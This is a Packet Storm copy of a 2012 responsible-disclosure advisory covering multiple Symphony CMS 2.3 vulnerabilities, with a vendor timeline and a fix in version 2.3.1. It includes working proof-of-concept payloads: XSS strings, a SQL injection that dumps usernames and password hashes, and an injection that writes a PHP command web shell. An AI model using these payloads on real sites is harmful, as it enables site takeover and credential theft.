what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Symphony CMS 2.3 XSS / SQL Injection / Disclosure

Symphony CMS 2.3 XSS / SQL Injection / Disclosure
Posted Oct 17, 2012
Authored by Wireghoul | Site justanotherhacker.com

Symphony CMS version 2.3 suffers from cross site scripting, path disclosure, remote shell upload, token brute force, and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss, sql injection
SHA-256 | 2b1824a17383c70bba1e1643ea148290b08e042f50a7123cb88114364f39cfc2

Symphony CMS 2.3 XSS / SQL Injection / Disclosure

Change Mirror Download
Symphony cms 2.3 multiple vulnerabilities

--------------------------------------------------------------------------------------------
20121017 - Justanotherhacker.com : Symphony cms - Multiple vulnerabilities
JAHx122 - http://www.justanotherhacker.com/advisories/JAHx122.txt
--------------------------------------------------------------------------------------------

Symphony is an XSLT-powered open source content management system.
[ Taken from: http://getsymphony.com/ ]


--- Vulnerability description ---
Symphony-cms version 2.3 is vulnerable to several vulnerabilities ranging in
severity from low to high and can result in complete compromise by an
unauthenticated attacker.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible
Vendor: Symphony - http://getsymphony.com
Affected versions: 2.3 (and possibly earlier)

--- Local patch disclosure ---
Direct requests to library files will disclose the full local file path if php is configured
to display errors due to the reliance on the library path being declared in a constant
of global scope outside of the library script.

PoC:
http://host/path/symphony/lib/boot/bundle.php

--- User enumeration ---
The retrive password url http://host/path/symphony/login/retrieve-password/ will display a
helpful error message if the email address entered does not exist in the database.

--- Authentication token brute force ---
Symphony-cms allows a user to login without entering their username and password via
a remote auth url that contains a token made up of the first 8 characters of a sha1 hash
of the user's username and hashed password.

If a user has auth_token_active set to yes in the sym_authors table an attacker can login to
their account by brute forcing a key of [0-9A-F]^8 length.

The url http://host/path/symphony/login/[token]/ ie: http://host/path/symphony/login/a39880be/
for the user "admin" with password "admin".


--- Cross site scripting ---
Reflected:
The email input field supplied to http://host/path/symphony/login/retrieve-password/ is not
sufficiently filtered for malicious characters resulting in reflected cross site scripting.

PoC:
Submit form with email address:
"><script>alert(1)</script>

Reflected:
The email input field supplied to http://host/path/symphony/login/ is not sufficiently
filtered for malicious characters resulting in reflected cross site scripting.

PoC:
username=%22%3E%3C%2Finput%3E%3Cscript%3Ealert%28%27k63ddgb6ra%27%29%3C%2Fscript%3E&password=on

Persistent:
The "From name" preference setting in Symphony-cms (http://host/path/symphony/system/preferences/)
is not sufficiently encoded resulting in persistent cross site scripting.

PoC:
settings%5Bemail_sendmail%5D%5Bfrom_name%5D=Symphony%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

--- Blind sql injection ---
The username field in the authors detail page is not sufficiently filtered when checking
is the username already exists in the system. Resulting in blind sql injection.

PoC:
Edit an author's profile, update the username to include a malicious payload, ie:
username' union select "<?php @system($_REQUEST['cmd']); ?>" FROM sym_authors INTO OUTFILE '/var/www/workspace/haxed.php
where the path to your outfile is based on the local path disclosure.

--- SQL Injection ---
The "page" number supplied when editing blueprints is vulnerable to sql injection.

We can retrieve a users username, hashed password and auth token status with the following PoC:
http://host/path/symphony/bluePRINTs/pages/edit/0%29+union+select+1,2,username,password,5,auth_token_active,7,8,9+from+sym_authors+where+id+=+1+--+/

--- Unrestricted file upload ---
While this appears to be intended functionality for authorised users, combined
with the aforementioned vulnerabilities it becomes trivial to place a backdoor
on the system.

--- Solution ---
Upgrade to version 2.3.1.

--- Disclosure time line ---
17-Oct-2012 - Public disclosure
03-Oct-2012 - Issues patched in upcoming release
18-Sep-2012 - Patch checked into git
17-Sep-2012 - Vendor response
14-Sep-2012 - Vendor notified through email



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close